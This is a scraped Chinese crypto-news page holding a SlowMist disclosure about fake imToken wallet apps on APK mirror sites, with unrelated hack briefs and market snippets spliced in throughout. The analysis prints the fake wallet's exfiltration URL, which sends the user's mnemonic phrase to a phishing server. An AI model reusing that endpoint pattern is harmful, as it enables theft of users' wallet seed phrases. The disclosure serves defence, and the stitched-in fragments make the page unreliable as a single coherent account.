原文作者:?山&耀
技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。
當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包“登錄”;這與我們傳統意義上的“登錄”不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行“登錄”,我們可以看到“登錄”錢包時顯示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而錢包是你在Web3世界中的唯一通行證。
慢霧:Platypus再次遭遇攻擊,套利者獲取約5萬美元收益:7月12日消息,SlowMist發推稱,穩定幣項目Platypus似乎再次收到攻擊。由于在通過CoverageRatio進行代幣交換時沒有考慮兩個池之間的價格差異,導致用戶可以通過存入USDC然后提取更多USDT來套利,套利者通過這種方式套利了大約50,000美元USDC。[2023/7/12 10:50:27]
俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。
在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?
慢霧:Poly Network再次遭遇黑客攻擊,黑客已獲利價值超439萬美元的主流資產:金色財經報道,據慢霧區情報,Poly Network再次遭遇黑客攻擊。分析發現,主要黑客獲利地址為0xe0af…a599。根據MistTrack團隊追蹤溯源分析,ETH鏈第一筆手續費為Tornado Cash: 1 ETH,BSC鏈手續費來源為Kucoin和ChangeNOW,Polygon鏈手續費來源為FixedFloat。黑客的使用平臺痕跡有Kucoin、FixedFloat、ChangeNOW、Tornado Cash、Uniswap、PancakeSwap、OpenOcean、Wing等。
截止目前,部分被盜Token (sUSD、RFuel、COOK等)被黑客通過Uniswap和PancakeSwap兌換成價值122萬美元的主流資產,剩余被盜資金被分散到多條鏈60多個地址中,暫未進一步轉移,全部黑客地址已被錄入慢霧AML惡意地址庫。[2023/7/2 22:13:22]
據數據統計站點similarweb統計,apkcombo站點:
慢霧:BXH 第一次被盜資金再次轉移,BTC 網絡余額超 2700 BTC:金色財經報道,10月8日凌晨(UTC+8),慢霧監控到 BXH 第一次被盜資金再次出現異動,經慢霧 MistTrack 分析,異動詳情如下:
黑客地址 0x48c9...7d79 將部分資金(213.77 BTCB,5 BNB 和 1 ETH)轉移至新地址 0xc01f...2aef,接著將資金兌換為 renBTC 跨鏈到 BTC 網絡,跨鏈后地址為 1JwQ...u9oU。1JwQ...u9oU 在此次轉移中接收到的總資金為 204.12 BTC。截止目前,BXH 第一次被盜事件在 BTC 網絡共有 4 個黑客地址,總計余額為 2701.3 BTC,暫未進一步轉移。慢霧 MistTrack 將持續監控被盜資金的轉移。[2022/10/8 12:49:28]
全球排名:?1,?809?
慢霧:Transit Swap黑客攻擊交易被搶跑,套利機器人獲利超100萬美元:10月1日消息,據慢霧安全團隊情報,Transit Swap 黑客轉移用戶 BSC 鏈 BUSD 資產時被套利機器人搶跑,區塊高度為21816885,獲利107萬BUSD。套利機器人相關地址列表如下:0xa957...70d2、0x90b5...8ff4、0xcfb0...7ac7、
截止到目前,在各方的共同努力下,黑客已將 70% 左右的被盜資產退還到Transit Swap開發者地址,建議套利機器人所屬人同樣通過service@transit.finance或鏈上地址與Transit Swap取得聯系,共同將此次被盜事件的受害用戶損失降低到最小。[2022/10/2 18:37:44]
國家排名:?7,?370?
品類排名:?168?
我們可以看到它的影響力和流量都非常大。
它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:
那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?
我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:
https://play.google.com/store/apps/details??id=im.token.app
由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。
而apkcombo鏡像站的下載路徑為:
https://apkcombo.com/downloader/#package=im.token.app
上圖我們可以發現,apkcombo提供的版本為24.9.11?,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。
在編寫本文時imToken錢包的最新版本為2.11.3?,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。
如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。
同時我們發現類似的下載站還有如:uptodown
下載地址:https://imtoken.br.uptodown.com/android
我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:
慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。
我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:
根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:
https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助記詞>
看下圖,最早的“api.funnel.rocks”證書出現在2022-06-03?,也就是攻擊開始的大概時間:
俗話說一圖勝千言,最后我們畫一個流程圖:
交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。
同時,如需使用錢包,請務必認準以下主流錢包App官方網址:
1?/imToken錢包:https://token.im/
2?/TokenPocket錢包:https://www.tokenpocket.pro/
3?/TronLink錢包:https://www.tronlink.org/
4?/比特派錢包:https://bitpie.com/
5?/MetaMask錢包:https://metamask.io/
6?/TrustWallet:https://trustwallet.com/
請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。
致謝:感謝在溯源過程中imToken官方提供的驗證支持。
由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。
Derebit的比特幣波動率指數(DVOL)剛剛跌至52,這是自3月8日以來的最低水平。盡管比特幣價格最近從上周觸及的31,000美元以上的10個月高點回落,但仍跌至六周多新低.
1900/1/1 0:00:004月27日消息,韓國央行在今日發布的《2022年支付結算報告》中表示:“監管部門負責加密資產的基礎監管,央行需要在穩定幣這一極有可能被用作支付手段的監管中發揮積極作用.
1900/1/1 0:00:00近期,加密借貸協議MapleFinance宣布將推出美國國債池后,其代幣$MPL上漲超20%。而近三個月內,$CREDI、$SMT和$FACTR等RWA概念代幣都上漲了10倍以上.
1900/1/1 0:00:00最近市場上熱點項目非arb鏈莫屬了,特比是鏈上AIdoge,開盤價格翻了百倍直接上線歐意,導致arb鏈上更是火爆一波,而在aidoge的火爆下,市場也出現了很多仿盤,但大多都是割韭菜的.
1900/1/1 0:00:00在上海升級之前,ECN有幸邀請到三個重要的流動性質押服務商StakeWise、RocketPool和Lido的代表做客ECNPodcast.
1900/1/1 0:00:00一個小小的復盤:關于ETH上海升級解鎖;盡管升級前很多人推演過上海升級后的情況——但他們只對了一半。關鍵點是在CEX,尤其是Binance.
1900/1/1 0:00:00